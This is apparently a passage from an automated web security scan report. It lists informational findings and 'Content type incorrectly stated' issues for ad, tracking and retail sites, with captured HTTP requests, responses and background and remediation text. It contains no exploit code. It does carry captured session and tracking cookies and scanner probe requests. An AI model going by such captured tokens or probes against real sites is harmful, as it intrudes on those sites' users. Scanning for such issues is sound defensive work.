Host: a.tribalfusion.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pastebin.com/trends
Cookie: ANON_ID=a5nu7qsjyDsATFM6F3NBZcS4jjwxe3ZbKpdowGBVqckWcPtlThJpRtWlWZbQOW4AoEgPOr9YR9KnlgIuvuWU2mVk8RFrNMI6sVaj7ZdXiTsf

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 202
Expires: 0
Connection: keep-alive

<script type="text/javascript" language="JavaScript">
var img = new Image();
img.src = "http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-tribalfusion&cg=96320028906&cc=1&rnd=1171840785";
</script>
...[SNIP]...

29.2. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3941.InviteMedia/B5396963.28

Request

GET /adi/N3941.InviteMedia/B5396963.28;sz=728x90;pc=[TPAS_ID];click=http://ads.bluelithium.com/clk?2,13%3B8d02082879581ff7%3B12ff663a67a,0%3B%3B%3B2397112293,CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAeqZj9i8BAAAAAAAAAGE2MjQzODgyLTdmNWEtMTFlMC04YTVhLTc3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=;ord=1305508816? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAAMAGSKWj0T-amZmZmZnpPwBwCJqODNY.AAAAAAAA8D8AcAiajgzWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI6aWeTWAZCpUsQVInXGZ0vFMokz1-sdRznR8RAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,Z%3D728x90%26s%3D1565884%26_salt%3D3199842828%26B%3D10%26r%3D0,a6243882-7f5a-11e0-8a5a-7747e4e0bc3c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

29.3. http://ad.doubleclick.net/adi/N4764.cruisecritic/B3091233 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4764.cruisecritic/B3091233

Request

Response

29.4. http://ad.doubleclick.net/adi/N4975.1207.TRAVELOCITY.COM/B5393428.18 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4975.1207.TRAVELOCITY.COM/B5393428.18

Request

Response

29.5. http://ad.doubleclick.net/adi/N5823.DbclkAdEx/B5478635.45 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.DbclkAdEx/B5478635.45

Request

Response

29.6. http://ad.doubleclick.net/adi/ta.cc.com.s/deals previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/ta.cc.com.s/deals

Request

Response

29.7. http://ad.doubleclick.net/adi/ta.cc.com.s/disney previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/ta.cc.com.s/disney

Request

Response

29.8. http://ad.doubleclick.net/adi/x1.dt/dt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/x1.dt/dt

Request

Response

29.9. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/x1.rtb/fingerhut/doubledma/ron/ctest

Request

Response

29.10. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/ActivityServer.bs

Request

GET /BurstingPipe/ActivityServer.bs?cn=as&ActivityID=97454&rnd=614425.47198385 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=jtvLaMz402WG00001jFD.aMPi0cOm00001iGbIaMPo0cFA00001idcDaMPm0cEt00001iEDtaMQF06b+00001iuIZaMPl0aMI00001iETRaMPm06b+00001jxYPaMPg0doZ00001idcEaMPm0cEt00001iN4OaMPo0d9d00000; B3=9xx40000000001uD8Yi+0000000001uD98IM0000000000uD9sKa0000000001uD8SlF0000000001uD8SlE0000000001uD8VS90000000001uD9fOJ0000000001uC8JJn0000000001uD8VSD0000000001uD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 16 May 2011 01:43:14 GMT
Connection: close
Content-Length: 267

ebReportingImg0 = new Image();
ebReportingImg0.src = 'http://segment-pixel.invitemedia.com/pixel?pixelID=2083&partnerID=31&clientID=1027&key=segment';
ebReportingImg1 = new Image();
ebReportingImg1.sr
...[SNIP]...

29.11. http://cdn5.tribalfusion.com/media/1956006/frame.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn5.tribalfusion.com
Path:	/media/1956006/frame.html

Request

Response

29.12. http://content.usatoday.com/asp/uas3/uasSignedOut.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://content.usatoday.com
Path:	/asp/uas3/uasSignedOut.htm

Request

GET /asp/uas3/uasSignedOut.htm HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/asp/usataj/usatajhost.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SiteLifeHost=gnvm6l3pluckcom; anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 07 Dec 2010 17:57:47 GMT
ETag: "801f6a413896cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 16 May 2011 01:28:38 GMT
Content-Length: 388

<div class="uasPageElement uasSignedOut">
<span class="uasGreeting">Join USA TODAY  </span>
<span class="uasPageControls">
<a class="uasSignIn" href="#SignIn">Sign in</a>
|
<
...[SNIP]...

29.13. http://content.usatoday.com/asp/usataj/usatajhost.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://content.usatoday.com
Path:	/asp/usataj/usatajhost.htm

Request

GET /asp/usataj/usatajhost.htm HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 13 Apr 2007 20:54:39 GMT
ETag: "80519af3d7ec71:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 16 May 2011 01:19:46 GMT
Content-Length: 345

<html><head><title></title></head><body>
<script type="text/javascript" src="usataj.js"></script>
<script type="text/javascript">
try {
parent.usatAj.HostProxyReady(usatAj);
} cat
...[SNIP]...

29.14. http://d.xp1.ru4.com/um previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.xp1.ru4.com
Path:	/um

Request

GET /um?_r=1&_o=62795&_i=52786&_u=CAESEO49KfNMA7ZNCWbrVI50sTw&cver=1&_r=1 HTTP/1.1
Host: d.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://d.xp1.ru4.com/meta?_o=179638&_t=cmcont&ssv_ptnr=pm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=AG-00000001389358554; 1780853-B1781017=3|1781033|0|0|0|1781015|1781012|-1; C1780853=0@4

Response

HTTP/1.1 400 Bad request
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 01:19:57 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Content-length: 147
Content-type: text/html
Connection: close

<HTML><HEAD><TITLE>Bad request</TITLE></HEAD>
<BODY><H1>Bad request</H1>
Your browser sent a query this server could not understand.
</BODY></HTML>

29.15. http://ds.addthis.com/red/psi/sites/travel.usatoday.com/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/travel.usatoday.com/p.json

Request

GET /red/psi/sites/travel.usatoday.com/p.json?callback=_ate.ad.hpr&uid=4dce8a530508b02d&url=http%3A%2F%2Ftravel.usatoday.com%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1&oss77b HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=1305398109.1EY|1305398109.60|1305398109.1OD|1305398109.1FE; dt=X; psc=4; uid=4dce8a530508b02d

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 16 May 2011 01:28:49 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 15 Jun 2011 01:28:49 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 16 May 2011 01:28:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:28:49 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

29.16. http://f.nexac.com/e/a-677/s-2140.xgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://f.nexac.com
Path:	/e/a-677/s-2140.xgi

Request

GET /e/a-677/s-2140.xgi?na_random=516841224&na_url=http%3A//www.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static&na_referrer=http%3A//ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest%3Bsz%3D728x90%3Bclick%3Dhttp%3A//bn.xp1.ru4.com/bclick%3F_f%3D8BWls1L7DgGK%26_o%3D15607%26_eo%3D747980%26_et%3D1305508796%26_a%3D1791737%26_s%3D0%26_d%3D1125798%26_pm%3D747980%26_pn%3D17918465%26redirect%3D%3Bu%3D17918465%3Bord%3D6394684%3F&na_title=Fingerhut%3A%20Credit%20Application&na_bksite=22&na_imsite=&na_iitaxid=&na_iicatid=&na_trncnv=mRn8Y3pPWrpy_yEEPuI6T0lqo5HPo1UDDYo9y1AT4qny6bqfWdNaY8CyzUjUE-oCYu1g8PP9mqMSB6Edtps_4g&na_trntrg=&na_trncrt=&na_ev=N&na_ct=0&na_kw= HTTP/1.1
Host: f.nexac.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Set-Cookie: na_id=2011051519270862126421219180; expires=Wed, 15-May-2013 01:33:20 GMT; path=/; domain=.nexac.com
Set-Cookie: na_lr=20110515; expires=Tue, 17-May-2011 07:33:20 GMT; path=/; domain=.nexac.com
Set-Cookie: na_ps=3; expires=Wed, 15-May-2013 01:33:20 GMT; path=/; domain=.nexac.com
X-Powered-By: Jigawatts
Content-type: text/html
Date: Mon, 16 May 2011 01:33:20 GMT
Server: lighttpd/1.4.18
Content-Length: 382

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
</head>
<body>

<iframe name="__bknsframe" src="http://tags.bluekai.com/psite/1846?partner=1&ret=h
...[SNIP]...

29.17. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Request

GET /activityi;src=1770367;type=madde922;cat=pshpy424;ord=311237617861.4795? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://us.playstation.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sun, 15 May 2011 20:26:47 GMT
Expires: Sun, 15 May 2011 20:26:47 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 194
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"></body></html>

29.18. http://https.edge.ru4.com/smartserve/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://https.edge.ru4.com
Path:	/smartserve/ad

Request

Response

29.19. http://odb.outbrain.com/utils/ping.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://odb.outbrain.com
Path:	/utils/ping.html

Request

Response

29.20. http://ping.chartbeat.net/ping previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ping.chartbeat.net
Path:	/ping

Request

GET /ping?h=blog.us.playstation.com&p=%2F2011%2F04%2F26%2Fupdate-on-playstation-network-and-qriocity%2F&u=ix9mg0xw31e8v9kg&d=blog.us.playstation.com&g=11784&n=0&c=0&x=0&y=10522&w=902&j=45&R=0&W=0&I=1&r=http%3A%2F%2Fus.playstation.com%2F&b=5398&t=j4i7jgr665be20y5&i=Update%20on%20PlayStation%20Network%20and%20Qriocity%20%E2%80%93%20PlayStation%20Blog&_ HTTP/1.1
Host: ping.chartbeat.net
Proxy-Connection: keep-alive
Referer: http://blog.us.playstation.com/2011/04/26/update-on-playstation-network-and-qriocity/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 503 Site over allowed capacity.
Server: nginx/0.7.67
Date: Sun, 15 May 2011 20:29:59 GMT
Content-Type: text/html
Connection: close
Content-Length: 150

<HTML><HEAD>
<TITLE>503 Site over allowed capacity.</TITLE>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
Invalid method in request<P>
</BODY></HTML>

29.21. http://pixel.invitemedia.com/data_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/data_sync

Request

Response

29.22. http://serv.adspeed.com/ad.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://serv.adspeed.com
Path:	/ad.php

Request

Response

29.23. http://wow.weather.com/weather/wow/module/USNY0400 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wow.weather.com
Path:	/weather/wow/module/USNY0400

Request

GET /weather/wow/module/USNY0400?config=SZ=teaser*lnk=http|www.observertoday.com/page/weather.lg/*PID=1031326525*DN=www.observertoday.com*MD5=a3ba9b5a384a7b45c7888527b8381478&proto=http:&target=wx_module HTTP/1.1
Host: wow.weather.com
Proxy-Connection: keep-alive
Referer: http://www.observertoday.com/page/content.detail/id/559280/-Special-day--for-1-000-graduates-at-Fredonia-State.html?nav=5047
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

29.24. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/StoreCatalogDisplay

Request

NETSPARKER /webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.sonystyle.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 216
Expires: Sun, 15 May 2011 21:20:12 GMT
Date: Sun, 15 May 2011 21:20:12 GMT
Connection: close

<HTML><HEAD>
<TITLE>Bad Request</TITLE>
</HEAD><BODY>
<H1>Bad Request</H1>
Your browser sent a request that this server could not understand.<P>
Reference #7.961ff648.1305494412.0

...[SNIP]...

30. Content type incorrectly stated previous next
There are 53 instances of this issue:

http://6e8d64.r.axf8.net/mr/a.gif
http://a.monetate.net/trk/3/s/a-06b34e08/p/travelocity.com/566828221
http://blog.us.playstation.com/wp-content/themes/twenty11/images/ps_bg_support_gif.gif
http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs
http://cdn.gigya.com/js/gigya.services.socialize.plugins.simpleshare.min.js
http://contextweb.usatoday.net/asp/Context/ContextWebHandler.ashx
http://eval.bizrate.com/js/survey_126457_1.js
http://feeds.delicious.com/v2/json/urlinfo/data
http://fingerhut-www.baynote.net/baynote/tags3/common
http://gs.instantservice.com/geoipAPI.js
http://https.edge.ru4.com/smartserve/ad
http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_903.aspx
http://ots.optimize.webtrends.com/ots/ots/js-3.0/90335/317ef0c53ce434d79761760b1d40347dce1dade30efce8abb9cea602dae5fab7b06f4e93bb3f667a07ee563cf7bc2d4232f06bb7f9551780b68f113eb9a117f9a8f5e92ac06d40757c1f327af58842cd4ede645d42893c1cf7567b7c149eccb35356fa98e2ffc3ea1f7e23859254a9bc687cbd012c1294d6dd5fa4663a918ff41c437a0301317f373b3c0992b6d96981bda65e1d1fe4c47301325b8ca01bf7ba47ae225e2a2f2e826ec46b03e5fe8b034e8401cc58a67b3ef660684ba53727e6b4a59cf85b09fac363756abce482b7010a01a64b1139be6bc27a0107ea3fafa6bc66290a5e4901c66449407eaead3c062013e948ce98836c6ae4f48bc0a677d48de9109ba9f81c0adda9668dcf3868ac5307153b025338ebe5b5422ea4af743d0141749c639ad70ccbd31237c2a742c40719df3207ef5dd54f702632f58045b6e44bcca9d6a9060b2ca294a1c6c3e821c27f51b4679ad80bd6619d689e737f8aad5a15363b2761f8586e4ce4695ee1944d4695e2fdbad38ff824a43cc131fd452fce2a70a89ee5a7811f32ef0c544ac6f3b9c4bdbb09c0480bbc0cdeaa5da019ab9355b6b76f9f766b060164eb11
http://ots.optimize.webtrends.com/ots/ots/js-3.0/90335/317ef0c53ce434d79761760b1d40347dce1dade30efce8abb9cea602dae5fab7b06f4e93bb3f667a07ee563cf7bc2d4232f06bb7f9551780b68f113eb9a117f9a8f5e92ac06d40757c1f327af58842cd4ede645d42893c1cf7567b7c149eccb35356fa98e2ffc3ea1f7e23859254a9bc687cbd012c1294d6dd5fa4663a918ff41c437a0301317f373b3c0992b6d96981bda65e1d1fe4c47301325b8ca01bf7ba47ae225e2a2f2e826ec46b03e5fe8b034e8401cc58a67b3ef660684ba53727e6b4a59cf85b09fac363756abce482b7010a01a64b3735b56bff791556b569e5e8e5242213410e46817a400930a8a5210c391eb4099bcdd45011c8c2b4edf7228481e91dc3f9c6351ac5eb78c686743ae34c0f193c0f5e25e2f9c11e68faf23a27751d30db21d18f34cfde0468a1a617f42a00cf7209ab4a9216327370b8d618eca71f90ecccf5415273b68aada887b54ba32604e61fcb904980258a678379798baa4414353b6f78ea033614b82e0ab09a5562e8c8d6a2c4c0b824a928c637f44222cd3c68a4f089e2c04760f501414adef2a7cca4fa49831a56ff1edcb91ce345c1d008e6f37a87293457074e626b842250ca5e307da3a5e46ffb4c736227395daeaaa5bc747ad115097fe63832d4021305db140de7cc84ebd182f34aa56da56d73a5ff1e5bcb2efdbf54edfb0fc746c5c8871b2ed942f4ea6203be921f533a8d8b6dfd5eb99b71b31a912f060e8d9da8ae0dd543ae249e956a8b64b1964d41954eca97247abd18e042fcb7170aed7bb7e0d7cee603452c43
http://secureshopping.mcafee.com/images/favicon.ico
http://shop.pacsun.com/js/widget-qv-uc.jsp
http://sitelife.usatoday.com/ver1.0/sys/jsonp.app
http://sony.tt.omtrdc.net/m2/sony/mbox/ajax
http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/mbox/standard
http://sr2.liveperson.net/hcp/html/mTag.js
http://ts.istrack.com/trackingAPI.js
http://us.playstation.com/uwps/CookieHandler
http://webassets.scea.com/pscomauth/groups/public/documents/webasset/psn_favicon.ico
http://wow.weather.com/weather/wow/module/USNY0400
http://www.facebook.com/extern/login_status.php
http://www.fingerhut.com/assets/f/misc/bkgicon.jpg
http://www.fingerhut.com/fingerhut/assets/images/favicon.ico
http://www.fingerhut.com/fingerhut/css/sifr-config.jsp
http://www.fingerhut.com/js/financial-snapshot.jsp
http://www.fingerhut.com/js/persistent_cart.jsp
http://www.fingerhut.com/js/sifr.jsp
https://www.fingerhut.com/fingerhut/assets/images/favicon.ico
https://www.fingerhut.com/fingerhut/css/sifr-config.jsp
https://www.fingerhut.com/js/financial-snapshot.jsp
https://www.fingerhut.com/js/persistent_cart.jsp
https://www.fingerhut.com/js/sifr.jsp
http://www.footlocker.com/ns/hp/css/images/FL_Collections_arrow_l.gif
http://www.passporterboards.com/forums/customavatars/avatar15288_4.gif
http://www.passporterboards.com/forums/customavatars/avatar17690_3.gif
http://www.passporterboards.com/forums/customavatars/avatar18759_15.gif
http://www.passporterboards.com/forums/customavatars/avatar30289_3.gif
http://www.passporterboards.com/forums/customavatars/avatar3404_4.gif
http://www.passporterboards.com/forums/customavatars/avatar7184_7.gif
http://www.passporterboards.com/forums/signaturepics/sigpic1001_7.gif
http://www.passporterboards.com/forums/signaturepics/sigpic10872_14.gif
http://www.passporterboards.com/forums/signaturepics/sigpic17690_3.gif
http://www.passporterboards.com/forums/signaturepics/sigpic18031_10.gif
http://www.passporterboards.com/forums/signaturepics/sigpic18759_24.gif
http://www.passporterboards.com/forums/signaturepics/sigpic21228_3.gif
http://www.passporterboards.com/forums/signaturepics/sigpic3404_109.gif
http://www.passporterboards.com/forums/signaturepics/sigpic7184_20.gif
http://www.restorationhardware.com/sitewide/includes/footer/email-sign-up.jsp
http://www.toshibadirect.com/js/coremetrics/emptyfunctions.inc

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

30.1. http://6e8d64.r.axf8.net/mr/a.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://6e8d64.r.axf8.net
Path:	/mr/a.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript; charset=utf-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /mr/a.gif?a=6E8D64&v=1 HTTP/1.1
Host: 6e8d64.r.axf8.net
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
